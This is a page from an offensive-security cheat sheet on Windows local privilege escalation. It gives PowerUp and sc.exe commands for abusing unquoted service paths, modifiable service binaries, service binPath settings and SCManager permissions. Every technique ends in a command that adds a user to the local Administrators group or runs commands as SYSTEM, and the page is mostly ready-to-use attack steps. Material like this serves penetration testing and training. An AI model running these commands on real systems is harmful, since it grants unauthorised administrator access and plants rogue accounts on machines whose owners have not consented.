๐Ÿ•บ
๐Ÿ•บ
๐Ÿ•บ
๐Ÿ•บ
CheatSheets
Searchโ€ฆ
Introduction
Getting Started With Hacking
VMs on Mac
Windows
Enumeration
Local Privilege Escalation
UAC Bypasses
Persistance
Networking
Active Directory
Offensive Powershell
Enumeration
Lateral Movement
Escalation
Persistance
Mimikatz
Alternate Cred Dumps
MSSQL
Defences and Bypasses
Setting Up a Lab
Red Teaming
Phishing Payloads
Cobalt Strike
Metasploit
Linux
Networking
Enumeration
Local Privilege Escalation
Persistance
MySQL
Mainframes
HP Nonstop
IBM z/OS
Cloud
AWS
GCP
Azure
Web App
Tomcat
SQLMap
PHP
Mobile
Android
iOS
Exploit-Dev
Linux
Shellcode
Windows
WiFi
Alfa AWUS036ACH Setup
Aircrack-ng
Powered By GitBook
Local Privilege Escalation

Tools

PowerUp: https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc
BeRoot: https://github.com/AlessandroZ/BeRoot
Privesc: https://github.com/enjoiz/Privesc
WinPEA: https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite

Unquoted Service Paths

Takes a pre-compiled C# service binary and patches in the appropriate commands needed for service abuse. If a -UserName/-Password or -Credential is specified, the command patched in creates a local user and adds them to the specified -LocalGroup, otherwise the specified -Command is patched in. The binary is then written out to the specified -ServicePath. Either -Name must be specified for the service, or a proper object from Get-Service must be passed on the pipeline in order to patch in the appropriate service name the binary will be running under.
PowerUp
# Enumeration
Invoke-AllChecks
Get-ServiceUnquoted
โ€‹
# Abuse
Write-ServiceBinary -Name 'service' -Path <HijackPatch> (will add john:Password123!)
Write-ServiceBinary -Name 'service' -Path C:\WebServer\Abyss.exe -Command "net localgroup Administrators user /add"
โ€‹
# Restart Service (cmd)
sc stop service
sc start service

Modify Service Executable

Replaces the service binary for the specified service with one that executes a specified command as SYSTEM.
Takes a service Name or a ServiceProcess.ServiceController on the pipeline where the current user can modify the associated service binary listed in the binPath. Backs up the original service binary to "OriginalService.exe.bak" in service binary location, and then uses Write-ServiceBinary to create a C# service binary that either adds a local administrator user or executes a custom command. The new service binary is replaced in the original service binary path, and a custom object is returned that captures the original and new service binary configuration.
PowerUp
# Enumeration
Invoke-AllChecks
Get-ModifiableServiceFile
โ€‹
# Abuse
Install-ServiceBinary -Name 'service' (will add john:password123!)
Install-ServiceBinary -Name 'service' -Command "net localgroup Administrators user /add"
โ€‹
# Manual
Write-ServiceBinary -Name 'service' -Command "command" -Path "C:\service\write.exe"
โ€‹
# Restart Service (cmd)
sc stop service
sc start service
โ€‹
# Cleanup
Restore-ServiceBinary -Name service -BackupPath 'C:\temp\backup.exe'
โ€‹

Modify Service BinPath

Takes a service Name or a ServiceProcess.ServiceController on the pipeline that the current user has configuration modification rights on and executes a series of automated actions to execute commands as SYSTEM. First, the service is enabled if it was set as disabled and the original service binary path and configuration state are preserved. Then the service is stopped and the Set-ServiceBinPath function is used to set the binary (binPath) for the service to a series of commands, the service is started, stopped, and the next command is configured. After completion, the original service configuration is restored and a custom object is returned that captures the service abused and commands run.
PowerUp
# Enumeration
Invoke-AllChecks
Get-ModifiableService
โ€‹
# Abuse
Invoke-ServiceAbuse -Name 'service' (will create a local admin john:Password123!)
Invoke-ServiceAbuse -Name 'service' -Command "net localgroup Administrators user /add"
โ€‹
# Manual
โ€‹
sc config "servicename" binPath= "cmd.exe /c net localgroup administrators user/add"
sc stop "servicename"
sc start "servicename"

SCManager Abuse

# show permissions for service creation
cmd /c sc sdshow scmanager
โ€‹
This will show SDDL for scmanager. Is possible for low priv user to be included.
https://itconnect.uw.edu/wares/msinf/other-help/understanding-sddl-syntax/
โ€‹
# Launch service as system from user
sc create MyService displayName= "MyService" binPath= "C:\Windows\System32\net.exe localgroup Administrators USER /add" start= auto
โ€‹
# Restart Computer and will be admin!
Windows - Previous
Enumeration
Next - Windows
UAC Bypasses
Last modified 1yr ago
Copy link
Outline
Tools
Unquoted Service Paths
Modify Service Executable
Modify Service BinPath
SCManager Abuse